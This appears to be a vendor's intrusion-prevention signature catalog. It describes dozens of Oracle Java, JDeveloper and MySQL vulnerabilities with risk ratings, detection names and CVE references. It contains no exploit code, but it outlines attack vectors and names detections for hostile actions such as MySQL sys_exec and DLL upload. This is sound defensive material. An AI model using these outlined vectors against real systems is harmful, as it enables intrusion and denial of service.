Oracle-Java-Soundbank-Resource-Name-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Java SE and Java for Business

Risk:

Moderate

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java SE

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow in Oracle Java Runtime.

Situation:

File-Binary_Oracle-Java-Soundbank-Resource-Name-Stack-Buffer-Overflow

References:

CVE-2010-0839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839

BID-39070
http://www.securityfocus.com/bid/39070

Oracle-Java-Statistics.impl-Package-Sandbox-Breach

About this vulnerability:

A vulnerability in Oracle JDK and JRE

Risk:

Moderate

First detected in:

sgpkg-ips-1036-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle JDK

Type:

Input Validation

Description:

There exists a sandbox breach vulnerability in Oracle Java.

Situation:

File-Binary_Oracle-Java-Com.sun.org.glassfish.external.statistics.impl-Package-Sandbox-Breach

References:

CVE-2012-5076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5076

BID-56054
http://www.securityfocus.com/bid/56054

OSVDB-86350
http://www.osvdb.org/86350

Oracle-Java-Sun.awt.image.imagerepresentation.setpixels-Integer-Overflow

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported in Oracle Java. The vulnerability is due to improper validation of image and raster dimensions in the sun.awt.image.ImageRepresentation.setPixels method. A remote attacker can exploit this vulnerability by enticing the target user to visit a specially crafted web page. Successful exploitation of this vulnerability can allow execution of arbitrary code on a target system.

Situation:

File-Zip_Oracle-Java-Sun.awt.image.imagerepresentation.setpixels-Integer-Overflow

References:

CVE-2013-2420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2420

OSVDB-92339
http://www.osvdb.org/92339

Oracle-Java-Sun.awt.image.imaginglib.lookupbytebi-Memory-Corruption

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Oracle Java. The vulnerability is due to access of uninitialized memory during a call to sun.awt.image.ImagingLib.lookupByteBI method. A remote attacker can exploit this vulnerability by enticing the target user to visit a specially crafted web page. Successful exploitation of this vulnerability can allow execution of arbitrary code on a target system.

Situation:

File-Binary_Oracle-Java-Sun.awt.image.imaginglib.lookupbytebi-Memory-Corruption

References:

CVE-2013-2470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470

BID-60651
http://www.securityfocus.com/bid/60651

OSVDB-94356
http://www.osvdb.org/94356

Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

Moderate

First detected in:

sgpkg-ips-538-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Malfunction

Description:

There is a sandbox bypass vulnerability in Oracle Java. The vulnerability is due to an insecure invoke() method of the sun.tracing.ProviderSkeleton class. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Binary_Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass
File-Zip_Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass

References:

CVE-2013-2460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2460

BID-60635
http://www.securityfocus.com/bid/60635

OSVDB-94346
http://www.osvdb.org/94346

Oracle-Java-System.arraycopy-Race-Condition

About this vulnerability:

A vulnerability in Oracle Java SE

Risk:

High

First detected in:

sgpkg-ips-587-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java SE Embedded

Type:

Malfunction

Description:

A code execution vulnerability exists in Oracle Java. The vulnerability is due to a race condition in System.arraycopy(). This flaw could be used to disable the security manager and run Java code with full privileges. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.

Situation:

File-Binary_Oracle-Java-System.arraycopy-Race-Condition

References:

CVE-2014-0456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0456

OSVDB-105868
http://www.osvdb.org/105868

Oracle-Java-Web-Start-ActiveX-Control-LaunchApp-Memory-Access-Error

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

Moderate

First detected in:

sgpkg-ips-522-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Oracle Java Web Start. The vulnerability is due to memory corruption in javaws.exe, a helper application executed from the launchApp() method of the JWS ActiveX control. An attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation of this vulnerability can crash the vulnerable application creating a denial-of-service condition and could possibly be exploited to execute malicious code.

Situation:

File-Text_Oracle-Java-Web-Start-ActiveX-Control-Vulnerable-Method-Usage
File-Text_Oracle-Java-Web-Start-ActiveX-Control-LaunchApp-Memory-Access-Error

References:

CVE-2013-2416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2416

OSVDB-92337
http://www.osvdb.org/92337

Oracle-Java-Web-Start-Command-Argument-Injection-Remote-Code-Execution

About this vulnerability:

A vulnerability in Oracle Sun Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-442-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment; Oracle Java Development Kit

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Oracle Java Web Start. The vulnerability is due to insufficient validation of parameters sent to the java process. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with the privileges of the current user on the affected system.

Situation:

File-TextId_Oracle-Java-Web-Start-Argument-Injection-Remote-Code-Execution

References:

CVE-2012-0500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0500

BID-52015
http://www.securityfocus.com/bid/52015

OSVDB-79227
http://www.osvdb.org/79227

Oracle-Java-Xgetsampleptrfromsnd-Memory-Corruption

About this vulnerability:

A vulnerability in Oracle Java for Business

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Malfunction

Description:

A memory corruption vulnerability exists within Oracle JRE and JDK. The flaw is due to an input validation error within jsound!XGetSamplePtrFromSnd while processing user supplied Soundbank data. By enticing a target user to run a Java applet or a Java Web Start application, a remote attacker can exploit this vulnerability to execute arbitrary code on a target system. Successful exploitation could result in execution of arbitrary code within the security context of the current user.

Situation:

File-Binary_Oracle-Java-Xgetsampleptrfromsnd-Memory-Corruption

References:

CVE-2010-4462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4462

Oracle-Java-Zip_Util-Readcen-Stack-Overflow

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

Moderate

First detected in:

sgpkg-ips-442-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment; Oracle OpenJDK; Oracle Java Development Kit

Type:

Malfunction

Description:

A denial-of-service vulnerability has been discovered in the JRE. The vulnerability is due to an off-by-one error when processing zip archives. This results in a series of recursive calls, terminated by a stack overflow / segmentation fault. An attacker can exploit this vulnerability by causing an application to process a crafted zip archive. The exact nature of an attack will depend on the application's context.

Situation:

File-Zip_Oracle-Java-Zip_Util-Readcen-Stack-Overflow

References:

CVE-2012-0501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0501

BID-52013
http://www.securityfocus.com/bid/52013

OSVDB-79228
http://www.osvdb.org/79228

Oracle-JDeveloper-ADF-Faces-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle JDeveloper ADF Faces

Risk:

High

First detected in:

sgpkg-ips-1216-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle JDeveloper

Type:

Input Validation

Description:

There exists a vulnerability in Oracle JDeveloper ADF Faces, versions 11.1.1.9.0, 12.1.3.0.0, 12.2.1.3.0, which allows remote attackers to execute arbitrary code due to the insufficient validation of HTTP requests.

Situation:

HTTP_CS-Oracle-JDeveloper-ADF-Faces-Insecure-Deserialization

References:

CVE-2019-2904
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2904

Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle JDeveloper

Risk:

High

First detected in:

sgpkg-ips-1487-5242

Last changed:

sgpkg-ips-1830-5242

Platform:

Generic

Software:

Oracle JDeveloper

Type:

Input Validation

Description:

A vulnerability in Oracle JDeveloper, versions 12.2.1.3.0 and 12.2.1.4.0, which allows remote attackers to execute arbitrary code by sending crafted requets, due to the insufficient validation of HTTP requests referencing resources rendered from a remote region.

Situation:

HTTP_CSU-Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization
HTTP_SHS-Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization

References:

CVE-2022-21445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21445

Oracle-JRE-Shortcomponentraster.verify-Memory-Corruption

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment;Oracle Java Development Kit

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Oracle's Java Runtime. The vulnerability is due to insufficient input validation on ShortComponentRaster.verify() method parameters which will lead to bypassing of "dataOffsets[0]" boundary checks when the "numDataElements" field is 0. A remote attacker can exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation of this vulnerability can result in the execution of arbitrary code within the context of the currently logged in user.

Situation:

File-Zip_Oracle-JRE-Shortcomponentraster.verify-Memory-Corruption

References:

CVE-2013-2472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472

OSVDB-94335
http://www.osvdb.org/94335

Oracle-Multiple-Products-Hash-Collision-Denial-of-Service

About this vulnerability:

A vulnerability in multiple Oracle products

Risk:

High

First detected in:

sgpkg-ips-439-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Server 10g; Oracle WebLogic Server; Oracle iPlanet Web Server; Oracle Java System Web Server

Type:

Malfunction

Description:

There is a denial-of-service vulnerability in Oracle WebLogic Server, Oracle Application Server (OC4J) and Oracle iPlanet Web Server. The vulnerability is due to the use of non-randomized hash functions, making it possible to purposely create collisions in hash tables. A remote unauthenticated attacker can exploit this vulnerability to consume large amounts of CPU time on the application server by sending malicious requests to the server.

Situation:

HTTP_CS-Large-Number-Of-Parameters-In-POST-Request
HTTP_CRL-Too-Many-Parameters-In-GET-Request

References:

CVE-2011-5035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5035

BID-51194
http://www.securityfocus.com/bid/51194

Oracle-MySQL-Authentication-Integer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL Server

Risk:

Moderate

First detected in:

sgpkg-ips-900-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Integer Overflow

Description:

An integer overflow in the Pluggable Authentication module of MySQL causes a vulnerability which an attacker can exploit to cause a denial of service condition on the target system.

Situation:

MySQL_Oracle-MySQL-Authentication-Integer-Overflow

References:

CVE-2017-3599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3599

BID-97754
http://www.securityfocus.com/bid/97754

Oracle-Mysql-Client-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL Client

Risk:

High

First detected in:

sgpkg-ips-566-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle MySQL Client

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability has been reported in Oracle MySQL Client. This vulnerability is due to insufficient validation of the server's version string. A remote unauthenticated attacker can exploit this vulnerability by enticing the user to connect to a malicious server. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

MySQL_SS-Oracle-Mysql-Client-Heap-Buffer-Overflow

References:

CVE-2014-0001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0001

BID-65298
http://www.securityfocus.com/bid/65298

OSVDB-102713
http://www.osvdb.org/102713

Oracle-MySQL-Cluster-Data-Node-GSN_cm_regref-Handling-Remote-Code-Execution

About this vulnerability:

A vulnerability in Oracle MySQL Cluster

Risk:

Moderate

First detected in:

sgpkg-ips-1440-5242

Last changed:

sgpkg-ips-1440-5242

Platform:

Generic

Software:

MySQL

Type:

Malfunction

Description:

Improper handling of GSN_CM_REGREF signals causes an index boundary error in MySQL. A successful attack may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_cm_regref-Handling-Remote-Code-Execution

References:

CVE-2021-35598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35598

Oracle-MySQL-Cluster-Data-Node-GSN_continueb-Handling-Remote-Code-Execution

About this vulnerability:

A vulnerability in Oracle MySQL Cluster

Risk:

High

First detected in:

sgpkg-ips-1521-5242

Last changed:

sgpkg-ips-1521-5242

Platform:

Generic

Software:

Oracle MySQL Cluster

Type:

Malfunction

Description:

An index boundary error has been reported in Oracle MySQL. The vulnerability exists in the MySQL NDB Cluster component when handling GSN_CONTINUEB signals. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted packet to the vulnerable server. Successful exploitation will allow an attacker to execute arbitrary code in the context of the application.

Situation:

Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_continueb-Handling-Remote-Code-Execution

References:

CVE-2021-35594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35594

Oracle-MySQL-Cluster-Data-Node-GSN_Processinfo_Rep-Remote-Code-Execution

About this vulnerability:

A vulnerability in Oracle MySQL Cluster

Risk:

Moderate

First detected in:

sgpkg-ips-1443-5242

Last changed:

sgpkg-ips-1443-5242

Platform:

Generic

Software:

MySQL

Type:

Malfunction

Description:

Improper handling of GSN_PROCESSINFO_REP signals causes an index boundary error in MySQL. A successful attack may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Oracle-Mysql-Cluster-Data-Node-GSN_Processinfo_Rep-Handling-Remote-Code-Execution

References:

CVE-2021-35592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35592

Oracle-MySQL-Cluster-Data-Node-GSN_Sync_path_req-Parsing-Integer-Underflow

About this vulnerability:

A vulnerability in Oracle MySQL Cluster

Risk:

Moderate

First detected in:

sgpkg-ips-1544-5242

Last changed:

sgpkg-ips-1544-5242

Platform:

Generic

Software:

Oracle MySQL Cluster

Type:

Integer Overflow

Description:

Lack of proper validation of user supplied data causes an integer underflow vulnerability in MySQL. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_Sync_path_req-Parsing-Integer-Underflow

References:

CVE-2022-21550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21550

Oracle-MySQL-Cluster-Data-Node-GSN_TRIG_ATTRINFO-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL.

Risk:

High

First detected in:

sgpkg-ips-1439-5242

Last changed:

sgpkg-ips-1439-5242

Platform:

Generic

Software:

Oracle MySQL Cluster

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Oracle MySQL, versions 7.4.33 and before, 7.5.23 and before, 7.6.19 and before, 8.0.26 and before, in the MySQL NDB Cluster component when handling GSN_TRIG_ATTRINFO signals, which allows remote attackers to execute arbitrary code by sending a crafted packet to the target server.

Situation:

Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_TRIG_ATTRINFO-Handling-Buffer-Overflow

References:

CVE-2021-35621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35621

Oracle-MySQL-Cluster-GSN_CREATE_FRAGMENTATION_REQ-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL Cluster.

Risk:

High

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Generic

Software:

Oracle MySQL Cluster

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Oracle MySQL Cluster, versions 7.4.35 and prior, 7.5.25 and prior, 7.6.21 and prior, 8.0.28 and prior, in the MySQL NDB Cluster component when handling GSN_CREATE_FRAGMENTATION_REQ signals, which allows remote attackers to execute arbitrary code by sending a crafted packet to the vulnerable server.

Situation:

Generic_CS-Oracle-MySQL-Cluster-GSN_CREATE_FRAGMENTATION_REQ-Buffer-Overflow

References:

CVE-2022-21489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21489

Oracle-MySQL-Cluster-GSN_CREATE_NODEGROUP_IMPL_REQ-RCE

About this vulnerability:

A vulnerability in Oracle MySQL.

Risk:

High

First detected in:

sgpkg-ips-1487-5242

Last changed:

sgpkg-ips-1487-5242

Platform:

Generic

Software:

Oracle MySQL Cluster

Type:

Malfunction

Description:

A vulnerability in Oracle MySQL Cluster, versions 7.4.35 and prior, 7.5.25 and prior, 7.6.21 and prior, 8.0.28 and prior, which allows remote attackers to execute arbitrary code by sending crafted packets, due to an index boudary error in the MySQL NDB Cluster component when handling GSN_CREATE_NODEGROUP_IMPL_REQ signals.

Situation:

Generic_TCP-Oracle-MySQL-Cluster-GSN_CREATE_NODEGROUP_IMPL_REQ-RCE

References:

CVE-2022-21490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21490

Oracle-MySQL-Cluster-Management-API-dumpState-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL Cluster.

Risk:

High

First detected in:

sgpkg-ips-1468-5242

Last changed:

sgpkg-ips-1468-5242

Platform:

Generic

Software:

Oracle MySQL Cluster

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Oracle MySQL Cluster, versions 7.4.34 and prior, 7.5.24 and prior, 7.6.20 and prior, 8.0.27 and prior, which allows remote attackers to execute arbitrary code by sending a crafted packet to the target server, due to a malfunction in the MySQL NDB Cluster component.

Situation:

Generic_CS-Oracle-MySQL-Cluster-Management-API-dumpState-Stack-Buffer-Overflow

References:

CVE-2022-21280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21280

Oracle-MySQL-Cluster-Management-API-Report_Event-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL Cluster

Risk:

Moderate

First detected in:

sgpkg-ips-1452-5242

Last changed:

sgpkg-ips-1452-5242

Platform:

Generic

Software:

MySQL

Type:

Buffer Overflow

Description:

Improper parsing of command parameters in the MySQL NDB Cluster component causes a stack buffer overflow which can be exploited to execute arbitrary code on the target system with the privileges of the database.

Situation:

Generic_CS-Oracle-MySQL-Cluster-Management-API-Report_Event-Stack-Buffer-Overflow

References:

CVE-2022-21279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21279

Oracle-MySQL-Cluster-Management-API-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL Cluster

Risk:

Moderate

First detected in:

sgpkg-ips-1433-5242

Last changed:

sgpkg-ips-1433-5242

Platform:

Generic

Software:

MySQL

Type:

Buffer Overflow

Description:

Improper validation of cluster api messages causes a stack buffer overflow in MySQL. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Oracle-MySQL-Cluster-Management-API-Stack-Buffer-Overflow

References:

CVE-2021-35590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35590

Oracle-MySQL-Database-Com_Field_Fist-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Buffer Overflow

Description:

A security bypass vulnerability has been reported in MySQL database server. The vulnerability is due to an error while parsing a table name argument of a COM_FIELD_LIST command packet. Remote authenticated attacker can exploit this vulnerability by sending malicious COM_FIELD_LIST command packet. In an attack scenario where code execution is successful the injected code will be executed within the security context of the service. An unsuccessful exploitation would cause the database service to terminate abnormally.

Situation:

MySQL_Oracle-MySQL-Database-Com_Field_Fist-Buffer-Overflow

References:

CVE-2010-1850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1850

BID-40106
http://www.securityfocus.com/bid/40106

Oracle-Mysql-Database-In-And-Case-Null-Argument-Denial-Of-Service

About this vulnerability:	A vulnerability in Oracle MySQL
Risk:	Moderate
First detected in:	sgpkg-ips-435-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	MySQL
Type:	Malfunction
Description:	A Denial of Service vulnerability exists in Oracle MySQL database server. The vulnerability is due to an error while handling IN or CASE functions when NULL arguments are passed to the functions either by the WITH ROLLUP modifier or explicitly. Remote authenticated attackers can exploit this vulnerability by sending malicious command packets to the server. Successful exploitation would cause the target server to terminate, denying service to all users until the server is restarted.
Situation:	MySQL_Oracle-Mysql-Database-In-And-Case-Null-Argument-Denial-Of-Service

Oracle-MySQL-Database-Unique-SET-Column-Join-Denial-of-Service

About this vulnerability:	This is the published proof of concept attack against MySQL using joins involving an unique SET column.
Risk:	Moderate
First detected in:	sgpkg-ips-343-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	MySQL
Type:	Malfunction
Description:	This fingerprint detects the published proof of concept recording using joins involving an unique SET column.
Situation:	MySQL_Oracle-MySQL-Database-Unique-SET-Column-Join-Denial-of-Service

Oracle-MySQL-Delete-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL

Risk:

High

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in MySQL database server. The vulnerability is due to an error while parsing the DELETE command. A remote authenticated attacker can exploit this vulnerability by sending a malicious DELETE command to the affected service. In an attack scenario where code execution is successful, the injected code will be executed within the security context of the service. An unsuccessful exploitation attempt would cause the database service to terminate abnormally.

Situation:

MySQL_CS-Oracle-MySQL-Delete-Heap-Buffer-Overflow

References:

CVE-2012-5612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5612

BID-56768
http://www.securityfocus.com/bid/56768

OSVDB-88064
http://www.osvdb.org/88064

Oracle-MySQL-Drop-Table

About this vulnerability:	Drop Table command
Risk:	Moderate
First detected in:	sgpkg-ips-415-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	MySQL
Type:	SQL Injection
Description:	A DROP TABLE command was detected
Situation:	MySQL_Oracle-MySQL-Drop-Table

Oracle-MySQL-Grant-Command-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL

Risk:

High

First detected in:

sgpkg-ips-496-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in MySQL database server. The vulnerability is due to an error while parsing a priv_level argument of a GRANT command. Remote authenticated attackers can exploit this vulnerability by sending a malicious GRANT command to the affected service. In an attack scenario where code execution is successful, the injected code will be executed within the security context of the service. An unsuccessful exploitation attempt would cause the database service to terminate abnormally.

Situation:

MySQL_CS-Oracle-MySQL-Grant-Command-Stack-Buffer-Overflow

References:

CVE-2012-5611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611

OSVDB-88066
http://www.osvdb.org/88066

Oracle-MySQL-Payload-Execution

About this vulnerability:	An attempt to exploit a vulnerability in Oracle MySQL detected
Risk:	High
First detected in:	sgpkg-ips-402-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	MySQL
Type:	Malfunction
Description:	Vulnerable version of MySQL for Windows allow writing arbitrary binary code to .dll files with system permissions, and subsequent execution.
Situation:	MySQL_Oracle-MySQL-Sys-Exec MySQL_Oracle-MySQL-Dumpfile-DLL-Upload

Oracle-Mysql-Server-Geometry-Query-Denial-Of-Service

About this vulnerability:

A vulnerability in Oracle MySQL

Risk:

High

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Malfunction

Description:

A denial-of-service vulnerability has been reported in MySQL database server. The vulnerability is due to an error while parsing geometry queries. Remote authenticated attackers can exploit this vulnerability by sending malicious commands to the affected service. Successful exploitation would cause the database service to terminate abnormally.

Situation:

MySQL_CS-Oracle-Mysql-Server-Geometry-Query-Denial-Of-Service

References:

CVE-2013-1861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1861

BID-58511
http://www.securityfocus.com/bid/58511

OSVDB-91415
http://www.osvdb.org/91415

Oracle-Mysql-Server-Geometry-Query-Heap-Integer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL

Risk:

High

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Integer Overflow

Description:

A heap buffer overflow vulnerability exists in MySQL database server. The vulnerability is due to an error while parsing geometry queries. Remote authenticated attackers can exploit this vulnerability by sending malicious commands to the affected service. A successful exploitation can lead to arbitrary code execution in the context of the affected service, which is SYSTEM on Windows systems.

Situation:

MySQL_CS-Oracle-Mysql-Server-Geometry-Query-Heap-Integer-Overflow

References:

CVE-2013-1861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1861

BID-58511
http://www.securityfocus.com/bid/58511

OSVDB-91415
http://www.osvdb.org/91415

Oracle-MySQL-Server-Innodb-Memcached-Plugin-Get-Request-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-1427-5242

Last changed:

sgpkg-ips-1427-5242

Platform:

Generic

Software:

MySQL

Type:

Buffer Overflow

Description:

Improper input handling in the InnoDB memcached plugin component causes a buffer overflow vulnerability which can be exploited to allow an attacker to run arbitrary code on the target system.

Situation:

Generic_CS-Oracle-MySQL-Server-Innodb-Memcached-Plugin-Get-Request-Buffer-Overflow

References:

CVE-2021-2429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2429

Oracle-Mysql-Server-Innodb-Memcached-Plugin-Resource-Exhaustion

About this vulnerability:

A vulnerability in Oracle MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Resource Starvation

Description:

A memory exhaustion vulnerability has been reported in the InnoDB memcached plugin component of Oracle MySQL Server. This vulnerability is due to incorrect freeing of allocated memory when processing certain type of requests. A remote unauthenticated attacker can exploit this vulnerability by sending large numbers of a certain type of command to the memcached plugin of MySQL server. Successful exploitation would result in the service's inability to allocate memory. This can result in a termination of the vulnerable program denying service to legitimate users.

Situation:

Analyzer_MySQL-InnoDB-Memcached-Plugin-Resource-Exhaustion
Generic_CS-Memcached-Suspicious-Bind-Command

References:

CVE-2013-1570
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1570

OSVDB-92468
http://www.osvdb.org/92468

Oracle-MySQL-Server-Innodb-Memcached-Plugin-SASL_Auth-Integer-Underflow

About this vulnerability:

A vulnerability in Oracle MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-1424-5242

Last changed:

sgpkg-ips-1424-5242

Platform:

Generic

Software:

MySQL

Type:

Integer Overflow

Description:

An integer underflow vulnerability in the InnoDB memcached plugin component of Oracle MySQL can be exploited to allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Oracle-MySQL-Server-Innodb-Memcached-Plugin-SASL_Auth-Integer-Underflow

References:

CVE-2021-2390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2390

Oracle-Mysql-Server-Xpath-Denial-Of-Service

About this vulnerability:

A vulnerability in Oracle MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-585-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Malfunction

Description:

A memory-corruption vulnerability has been reported in the Oracle MySQL Server. This vulnerability is due to an error in the XPath component when processing queries containing XML function calls. A remote, authenticated attacker can exploit this vulnerability by sending a malicious SQL request to target server. Successful exploitation would result in a memory corruption on the server. This can result in a termination of the vulnerable program denying service to legitimate users.

Situation:

MySQL_CS-Oracle-Mysql-Server-Xpath-Denial-Of-Service

References:

CVE-2014-0384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0384

OSVDB-105911
http://www.osvdb.org/105911

Oracle-Opera-Remote-Code-Execution-CVE-2023-21932

About this vulnerability:

A vulnerability in Oracle Opera

Risk:

High

First detected in:

sgpkg-ips-1582-5242

Last changed:

sgpkg-ips-1582-5242

Platform:

Generic

Software:

Oracle Opera

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Oracle Hospitality OPERA 5 Property Services.

Situation:

HTTP_CSU-Oracle-Opera-Remote-Code-Execution-CVE-2023-21932

References:

CVE-2023-21932
